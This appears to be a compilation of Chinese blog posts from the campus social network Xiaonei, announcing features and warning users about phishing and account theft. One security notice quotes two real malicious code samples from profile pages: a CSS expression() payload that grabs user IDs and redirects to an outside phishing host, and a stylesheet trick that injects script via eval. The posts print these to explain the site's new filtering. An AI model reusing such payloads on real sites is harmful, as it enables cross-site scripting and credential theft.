新版“特别好友”加入了“描述我的特别好友”功能。拥有特别好友的用户除了可以在自己的页面上展示他们，而且可以为每一位特别好友编辑一个特别的描述。这个描述同样会出现在你的页面上，让大家更好的认识他们。

1、当用户将好友加为特别好友时，会自动进入描述编辑页；
2、用户也可以在“我的页面”上的特别好友板块，点击“编辑”或“描述我的特别好友”进入描述编辑页；
3、还可以在“我的好友”之“特别好友”列表中，点击“编辑”或“描述我的特别好友”进入编辑页面。
4、描述文字的字数限制在30字以内。

“我的好友”列表：


描述编辑页：


“我的好友”之“特别好友”列表：


“我的页面”之特别好友展示：

最近不少恶意用户利用涂鸦版的漏洞或发布连接，引导用户进入他们制作的和校内网一摸一样的页面来骗取我们的帐号或诈骗财物。
下面我们来做一下分析怎样防止上当受骗
诈骗手段：
1、利用涂鸦版的漏洞发布恶意代码，访问存在恶意代码用户的主页就会跳转到和校内一样的登陆页让你输入账号重新登陆
2、在留言/群中发布中将信息 或抽奖活动，诈骗我们的财物

对于第一种手段我们已经采取了过滤措施，恶意信息已经作了屏蔽，但是第二种方式我们防不胜防。那我们如何辨别信息的真实性呢？
辨别真伪：
首先我们要了解一下以下概念
1、首先我们需要了解什么是域名。 http://www.officeweb.com.cn/boss/files/a_07.htm 这篇文章中的 1 2 4 已经详细的描述清楚了。
2、地址栏 这个应该都知道 就是我们输入 网站地址（连接） 的地方。

以上的概念理解后，我想大家都知道我们校内网的域名是 xiaonei.com 。访问我们的网站你可以看到在你们的地址栏中的连接地址都是含有 xiaonei.com这个域名的。

比如这个连接 http://xiaonein.3355.cn/ （一个诈骗活动） 他的域名是 3355.cn ，这个就不是xiaonei的域名，而 blog.xiaonei.com 就是校内的域名，为什么呢？

这里有个2级域名的概念 二级域名是一级域名的子域名 在校内 xiaonei.com 是一级域名，就是我们通常说的校内的域名，blog.xiaonei.com 是校内的一个二级域名。

大家如果理解了这个，当你看到让你输入的帐号页面，或活动页面时，检查一下地址栏中的地址，是否以 http://xxx.xiaonei.com/ 开始，其中 “xxx” 是任意字符，如果不是，那就是诈骗信息。

不知道述清楚了没有，希望它对大家有益。

最近不少恶意用户利用网站的漏洞盗取私人帐号，给我们的用户带来不少的麻烦，给网站带来了负面的影响。
作恶用户的手段主要有以下几种
1、eval 声明javascript
2、样式表的 expression 属性声明javascript
3、利用样式表的漏洞 在样式中引入javascript 通过本地脚本配合
有不少的用户是通过引用 css 样式表来美化个人空间的，昨天最 link标签作了过滤，影响了不少的用户，但是为了更多用户的安全，我们必须这样作，所以建议大家在美化个人空间的时候尽量引用站内的样式或者将样式写入涂鸦版中。我们近期也会对 涂鸦版中站内引用/站外引用作文件过滤 消除这样的隐患，同时我们也会纪录下试图引用恶意代码的用户id， 以便对他们进行处罚，营造一个更好的校内网

比较典型的几段恶意代码

1、(expression漏洞)

<a href="http://www.zidou.com" target="_blank"><img src="http://img.zidou.com/img/zidou.gif" alt="美化页面如此简单" /></a><body background=""bgproperties="fixed"><bgsound src="http://hd9.15150.com/music1/2006_9_20/3120205_214715_16198.wma"><!--Devil's Bones! 06194691-w><!><div style="a:exp ression(if(loca\tion.href.indexOf('bones')==-1 && document.cookie.indexOf('bones=') == -1) loca\tion.href('http://home.goo'+'far.com/xianei/Error.asp?from='+parent.loca\tion.href.substring(parent.loca\tion.href.indexOf('id')+3).replace(/[^0-9]/g, '')+'&id='+document.getElementById('mymenu').innerHTML.substring(document.getElementById('mymenu').innerHTML.indexOf('http://xiaonei.com/getuser.do?id=') + 33, document.getElementById('mymenu').innerHTML.indexOf('我的页面')).replace(/[^0-9]/g, '')))"><DIV STYLE="s:ex\pression(if(document.cookie.indexOf('bones=') == -1) document.cookie='bones=z1;expires='+new Date(new Date().getTime()+10000).toGMTString())">



2、(link 漏洞)
<link
href="http://fm032.img.xiaonei.com/tribe/20070324/0340/A8956163GE.mp3"
rel="stylesheet" type="text/css" media="all" />
<div class=jscode>
codeJSUrl="http://fm022.img.xiaonei.com/tribe/20070325/1150/A4771284GE.mp3";
codeCSSUrl="http://source.xiaonei.com/tribe/20070118/1130/orig3213710.css";
var s2 = document.creat eElement("scr"+"ipt");
s2.src=codeJSUrl;
document.body.insert AdjacentE lement("BeforeBegin",s2);
</div>

http://fm032.img.xiaonei.com/tribe/20070324/0340/A8956163GE.mp3 css文件
内容：
.jscode{
display:none;
background:expression((this.innerHTML!="")?((eval(this.innerHTML+"this.innerHTML=''")==null)?"#aaa":"#123"):"#a00"
);
}

近日我们发现有人冒充校内网发布一些抽奖活动，网页做得和校内网很相似，请大家小心提防，不要上当!!

判别这类虚假网站的方法是看看浏览器的地址栏中是否为“xiaonei.com”，


比如底下的就是假的。


请大家告诉周围还不知道的同学，避免他人受骗。

近几天发现个别危险分子利用系统漏洞，用JS代码编写恶意代码。
使同学出现涂鸦板失效、群无故被删、群主无故转让等等奇怪症状。

恰逢年关，为了让大家都能过个好年，所以我们加强了代码过滤。

原来一些利用IE漏洞非法调用JS脚本的代码将不再有效。


图一

也许这样会导致许多本无恶意的同学的部分代码失效，
我们深表歉意，这段时间校内工作人员将会就这个问题作出更为恰当的处理，
例如在重要数据提交之前添加验证码等。

请大家现在在修改涂鸦板的同时注意备份。

若在修改涂鸦板时出现图一的提示。
请查证自己的涂鸦板内是否存在与图内疑似吻合的代码，

同时感染病毒的同学会在自己的涂鸦板看到一大段以：

<!--- You have been infected from ....

开头的代码。

请将自其而下的代码全部去掉以后再进行保存，

如果还有问题可以给我留言。

我们相关的技术人员有些驻留在总部，有些在火车上，有些刚刚下飞机，
只要能联系上的现在都在针对这个问题作出各种解决措施，
时间紧迫，未能尽善，
请身在家中的同学们予以理解，
让忙碌了整整一年的校工们能舒坦地过个好年，加满电，明年再为人民服务：）

希望这次校内的举措不会过度地影响大家的过节心情，
我仅代表校内的校工们真诚地祝愿大家新年愉快。




相关阅读：给“黑客”同学的一封信

由于需要加星的同学太多。
所以我有空也会帮忙去进行审核。

发现作为一个合格的审核人员，
最重要的条件就是: 熟悉全世界各地各样的红或者不红的明星。一眼放去，就能全部看个大概。

因为：只要是公众人物, 都有可能会被一些同学拿来做自己的头像。
这就需要审核队伍的同学们对所有或大或小的公众人物都要知晓。



如何成为星级用户？

要想获得星星需要的同时满足这三条：
1.本人的、真实的、年龄别和现在差太远的、能看清楚脸的照片作头像；

2.本人的、真实的中文姓名，可以加些修饰但一定要能看出哪个是名字来；

3.较为完善的个人资料。

在我们校内网,我们倡导使用真实姓名真实头像以及真实资料.
希望各位同学尽量使用自己真实的资料.
也许你已经通过了审核得了到星。但由于你后来使用假头像，也会被我们取消星级。

我们审核队伍的同学们早已练就了火眼金睛。:）

我们鼓励大家使用真实资料。
只有大家都这样做，才能保证在校内网里找到更多身边的同学以及朋友，才能更多地享受校内网的乐趣。。

新年将至，在这里，我代所有校内网的工作人员预祝各位同学：

新年好。
祝福大家在新的一年里，学业能有大的进展。生活质量更上一层楼。

近期发现有个别虚假用户通过校内的站内消息，帖子及校内通信息来传播诈骗信息，
大概形式为：



校内网作为一个创业团队，很惭愧还没有能力送出如此丰厚的礼物...这种需要链接到外部网站登录的且有诱人礼品的信息一定是虚假信息。

同学们一旦发现此类信息，请立即给管理员留言，举报发送此消息的用户，
同时附上该名用户的ID及内容的目标链接（例：上图的举报目标链接为：http://5q.zjtx.net）。

如何保护自己？

如果活动信息地址不是以xiaonei.com或xxxx.xiaonei.com开头的，则肯定不是校内网的官方活动地址。



遇到这种情况，请同学们积极举报。我们将义不容辞地在站内过滤此类链接及封闭此用户。

社区文明要大家一起来营造，愿同学们来年平安快乐：）

在校内网，除了和认识的人交流，我们还期待找到更多的新朋友，结识有意思的人，
在不太确定目标的时候，我们就‘随便看看’

随便看看，其实并不随便
所以，这次给大家带来的是激动人心的按条件筛选
根据调查，我们最终确定了这样几个筛选条件：大学，入学年，性别，兴趣爱好，家乡 和星座



其中我最喜欢的就是‘兴趣爱好’这项了 :)

比如我想找一找最近和我一样迷上《越狱》的女同学，现在很容易就做到了：
在兴趣爱好里输入：越狱，性别限定为：女

你还可以：
找到和自己喜欢同一本漫画、同一个歌手、同一种运动的同学，
找出和自己星座匹配的同学，
查一查本校的同乡，
随便看看隔壁学校的女生
……

好了，大家随便看看吧， 相信大家会在这里找到很多乐趣的：）

近期有一次5Q和校内合并以来最大的功能更新...我负责的是“分享”功能。

分享是一种美德

送人芝兰手有余香，这次推出的分享功能是一种尝试，目的是让同学们可以将平时看到的有趣东西向自己的好朋友分享，当然，你也可以将它当作自己的校内收藏夹，收藏精彩内容留待日后重温。

分享功能的操作非常便利，只要在网站里看到下面这个按钮：



只要轻轻点击，然后进行简短的评论，提交。

你的好友就可以收到你的分享提示：）

分享的内容暂时开放了四种：



我们将根据功能的情况来进行进一步开发，进一步开放更多的分享类型，例如活动、课程、站外链接等等。

分享后的内容可以在“我的分享”栏目统一管理，你也可以作为一个自己的收藏夹来使用：

 

新功能：状态